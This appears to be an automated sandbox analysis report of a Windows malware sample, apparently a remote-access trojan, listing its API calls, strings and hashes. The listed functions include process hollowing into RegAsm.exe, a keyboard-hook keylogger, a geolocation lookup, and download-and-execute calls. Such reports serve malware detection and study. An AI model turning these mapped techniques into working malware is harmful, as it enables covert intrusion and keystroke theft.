53919 413130 53917->53919 53920 412fe6 53918->53920 53921 402f10 28 API calls 53919->53921 53922 402f10 28 API calls 53920->53922 53923 41313f 53921->53923 53924 412ff2 53922->53924 54017 402ea1 53923->54017 53926 402f10 28 API calls 53924->53926 53928 412ffe 53926->53928 53930 402ea1 28 API calls 53928->53930 53929 404aa1 61 API calls 53931 413156 53929->53931 53932 41300d 53930->53932 53933 401fd8 11 API calls 53931->53933 53934 402f10 28 API calls 53932->53934 53935 413162 53933->53935 53936 413019 53934->53936 53938 401fd8 11 API calls 53935->53938 53937 402ea1 28 API calls 53936->53937 53940 413023 53937->53940 53939 41316e 53938->53939 53941 401fd8 11 API calls 53939->53941 53942 404aa1 61 API calls 53940->53942 53943 41317a 53941->53943 53944 413030 53942->53944 53945 401fd8 11 API calls 53943->53945 53946 401fd8 11 API calls 53944->53946 53947 413186 53945->53947 53948 413039 53946->53948 53949 401fd8 11 API calls 53947->53949 53950 401fd8 11 API calls 53948->53950 53951 41318f 53949->53951 53952 413042 53950->53952 53953 401fd8 11 API calls 53951->53953 53954 401fd8 11 API calls 53952->53954 53955 413198 53953->53955 53956 41304b 53954->53956 53957 401fd8 11 API calls 53955->53957 53958 401fd8 11 API calls 53956->53958 53959 41309c 53957->53959 53960 413054 53958->53960 53962 401fd8 11 API calls 53959->53962 53961 401fd8 11 API calls 53960->53961 53963 413060 53961->53963 53964 4131aa 53962->53964 53965 401fd8 11 API calls 53963->53965 53966 401f09 11 API calls 53964->53966 53967 41306c 53965->53967 53969 4131b6 53966->53969 53968 401fd8 11 API calls 53967->53968 53971 413078 53968->53971 53970 401fd8 11 API calls 53969->53970 53972 4131c2 53970->53972 53973 401fd8 11 API calls 53971->53973 53974 401fd8 11 API calls 53972->53974 53975 413084 53973->53975 53976 4131ce 53974->53976 53977 401fd8 11 API calls 53975->53977 53978 401fd8 11 API calls 53976->53978 53979 413090 53977->53979 53980 4131da 53978->53980 53981 401fd8 11 API calls 53979->53981 53982 
401fd8 11 API calls 53980->53982 53981->53959 53983 4131e6 53982->53983 53984 401fd8 11 API calls 53983->53984 53985 4131f2 53984->53985 53986 401fd8 11 API calls 53985->53986 53987 4131fe 53986->53987 53988 401fd8 11 API calls 53987->53988 53989 41320a 53988->53989 53990 401fd8 11 API calls 53989->53990 53991 413216 53990->53991 53992 401fd8 11 API calls 53991->53992 53993 412a83 53992->53993 53994 404e26 99 API calls 53993->53994 53994->53556 53996 40b90c 53995->53996 53997 402252 11 API calls 53996->53997 53998 40b917 53997->53998 54031 40b92c 53998->54031 54000 40b926 54000->53881 54003 41323c 54001->54003 54011 41326b 54001->54011 54002 41327a 54004 40417e 28 API calls 54002->54004 54043 411cf2 54003->54043 54006 413286 54004->54006 54008 401fd8 11 API calls 54006->54008 54009 412f28 54008->54009 54009->53889 54011->54002 54039 10001c5b 54011->54039 54014 41bd2b 54013->54014 54015 4020b7 28 API calls 54014->54015 54016 4130b1 54015->54016 54016->53897 54018 402eb0 54017->54018 54019 402ef2 54018->54019 54024 402ee7 54018->54024 54020 401fb0 28 API calls 54019->54020 54021 402ef0 54020->54021 54022 402055 11 API calls 54021->54022 54023 402f09 54022->54023 54023->53929 54142 403365 28 API calls 54024->54142 54143 441e81 54026->54143 54029 402093 28 API calls 54030 41bbc0 54029->54030 54030->53900 54032 40b966 54031->54032 54033 40b938 54031->54033 54038 4028a4 22 API calls 54032->54038 54034 4027e6 28 API calls 54033->54034 54037 40b942 54034->54037 54037->54000 54040 10001c6b ___scrt_fastfail 54039->54040 54047 100012ee 54040->54047 54042 10001c87 54042->54002 54089 411cfe 54043->54089 54046 411f67 22 API calls new 54046->54011 54048 10001324 ___scrt_fastfail 54047->54048 54049 100013b7 GetEnvironmentVariableW 54048->54049 54073 100010f1 54049->54073 54052 100010f1 57 API calls 54053 10001465 54052->54053 54054 100010f1 57 API calls 54053->54054 54055 10001479 54054->54055 54056 100010f1 57 API calls 54055->54056 54057 1000148d 54056->54057 54058 100010f1 57 
API calls 54057->54058 54059 100014a1 54058->54059 54060 100010f1 57 API calls 54059->54060 54061 100014b5 lstrlenW 54060->54061 54062 100014d2 54061->54062 54063 100014d9 lstrlenW 54061->54063 54062->54042 54064 100010f1 57 API calls 54063->54064 54065 10001501 lstrlenW lstrcatW 54064->54065 54066 100010f1 57 API calls 54065->54066 54067 10001539 lstrlenW lstrcatW 54066->54067 54068 100010f1 57 API calls 54067->54068 54069 1000156b lstrlenW lstrcatW 54068->54069 54070 100010f1 57 API calls 54069->54070 54071 1000159d lstrlenW lstrcatW 54070->54071 54072 100010f1 57 API calls 54071->54072 54072->54062 54074 10001118 ___scrt_fastfail 54073->54074 54075 10001129 lstrlenW 54074->54075 54086 10002c40 54075->54086 54078 10001177 lstrlenW FindFirstFileW 54080 100011a0 54078->54080 54081 100011e1 54078->54081 54079 10001168 lstrlenW 54079->54078 54082 100011c7 FindNextFileW 54080->54082 54083 100011aa 54080->54083 54081->54052 54082->54080 54085 100011da FindClose 54082->54085 54083->54082 54088 10001000 57 API calls ___scrt_fastfail 54083->54088 54085->54081 54087 10001148 lstrcatW lstrlenW 54086->54087 54087->54078 54087->54079 54088->54083 54122 41179c 54089->54122 54091 411d1c 54092 411d32 SetLastError 54091->54092 54093 41179c SetLastError 54091->54093 54119 411cfa 54091->54119 54092->54119 54094 411d4f 54093->54094 54094->54092 54096 411d71 GetNativeSystemInfo 54094->54096 54094->54119 54097 411db7 54096->54097 54108 411dc4 SetLastError 54097->54108 54125 411ca3 VirtualAlloc 54097->54125 54100 411de7 54101 411e0c GetProcessHeap HeapAlloc 54100->54101 54135 411ca3 VirtualAlloc 54100->54135 54102 411e23 54101->54102 54103 411e35 54101->54103 54136 411cba VirtualFree 54102->54136 54106 41179c SetLastError 54103->54106 54109 411e7e 54106->54109 54107 411dff 54107->54101 54107->54108 54108->54119 54110 411f30 54109->54110 54126 411ca3 VirtualAlloc 54109->54126 54137 412077 GetProcessHeap HeapFree 54110->54137 54113 411e97 ctype 54127 4117af SetLastError ctype 
___scrt_get_show_window_mode 54113->54127 54115 411ec3 54115->54110 54128 411b5f 26 API calls 54115->54128 54117 411ef0 54117->54110 54129 41194f 54117->54129 54119->54046 54120 411efb 54120->54110 54120->54119 54121 411f25 SetLastError 54120->54121 54121->54110 54123 4117a0 SetLastError 54122->54123 54124 4117ab 54122->54124 54123->54091 54124->54091 54125->54100 54126->54113 54127->54115 54128->54117 54130 411975 54129->54130 54132 411a70 54130->54132 54134 411a5e 54130->54134 54138 4118b2 54130->54138 54131 4118b2 VirtualProtect 54131->54132 54132->54120 54134->54131 54135->54107 54136->54108 54137->54119 54139 4118c3 54138->54139 54141 4118bb 54138->54141 54140 411936 VirtualProtect 54139->54140 54139->54141 54140->54141 54141->54130 54142->54021 54144 441e8d 54143->54144 54147 441c7d 54144->54147 54146 41bbb2 54146->54029 54148 441c94 54147->54148 54150 441ccb __cftof 54148->54150 54151 4405dd 20 API calls __dosmaperr 54148->54151 54150->54146 54151->54150 54152->53592 54154 4020f6 28 API calls 54153->54154 54155 415b0c SetEvent 54154->54155 54156 415b21 54155->54156 54157 4041a2 28 API calls 54156->54157 54158 415b3b 54157->54158 54159 4020f6 28 API calls 54158->54159 54160 415b4b 54159->54160 54161 4020f6 28 API calls 54160->54161 54162 415b5d 54161->54162 54163 41be1b 28 API calls 54162->54163 54164 415b66 54163->54164 54165 415cd6 54164->54165 54167 415b86 GetTickCount 54164->54167 54227 415ce5 54164->54227 54166 401e8d 11 API calls 54165->54166 54168 417092 54166->54168 54169 41bb8e 28 API calls 54167->54169 54171 401fd8 11 API calls 54168->54171 54172 415b97 54169->54172 54170 415cf9 54258 4050e4 84 API calls 54170->54258 54174 41709e 54171->54174 54232 41bae6 GetLastInputInfo GetTickCount 54172->54232 54177 401fd8 11 API calls 54174->54177 54176 415cc9 54176->54165 54179 4170aa 54177->54179 54178 415ba3 54180 41bb8e 28 API calls 54178->54180 54181 415bae 54180->54181 54233 41ba96 54181->54233 54184 41bd1e 28 API calls 54185 415bca 54184->54185 54186 

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 4236061018-3687161714
                                                          • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                          • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                          • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                          • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
                                                          • NtClose.NTDLL(?), ref: 004182F7
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                          • ResumeThread.KERNEL32(?), ref: 00418435
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                          • NtClose.NTDLL(?), ref: 00418468
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                          • GetLastError.KERNEL32 ref: 0041847A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                          • API String ID: 3150337530-3035715614
                                                          • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                          • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                          • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                          • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                          • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                          • GetLastError.KERNEL32 ref: 0040A2ED
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                          • TranslateMessage.USER32(?), ref: 0040A34A
                                                          • DispatchMessageA.USER32(?), ref: 0040A355
                                                          Strings
                                                          • Keylogger initialization failure: error , xrefs: 0040A301
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error
                                                          • API String ID: 3219506041-952744263
                                                          • Opcode ID: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                                                          • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                          • Opcode Fuzzy Hash: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                                                          • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

                                                          Control-flow Graph

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                          • FindClose.KERNEL32(00000000), ref: 100011DB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                          • String ID:
                                                          • API String ID: 1083526818-0
                                                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                          • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                          • Opcode Fuzzy Hash: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                          • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                          APIs
                                                            • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                          • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                            • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                            • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                            • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                          • String ID:
                                                          • API String ID: 3950776272-0
                                                          • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                          • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                          • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                          • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                          APIs
                                                            • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                            • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                            • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                          • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                          • ExitProcess.KERNEL32 ref: 0040F8CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 5.1.0 Pro$override$pth_unenc
                                                          • API String ID: 2281282204-182549033
                                                          • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                          • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                          • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                          • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadExecuteFileShell
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                          • API String ID: 2825088817-3056885514
                                                          • Opcode ID: 91da4de5f95f5ba244ecfd83e46997786a65a1bd925e81a499e122264e232277
                                                          • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                          • Opcode Fuzzy Hash: 91da4de5f95f5ba244ecfd83e46997786a65a1bd925e81a499e122264e232277
                                                          • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                          Strings
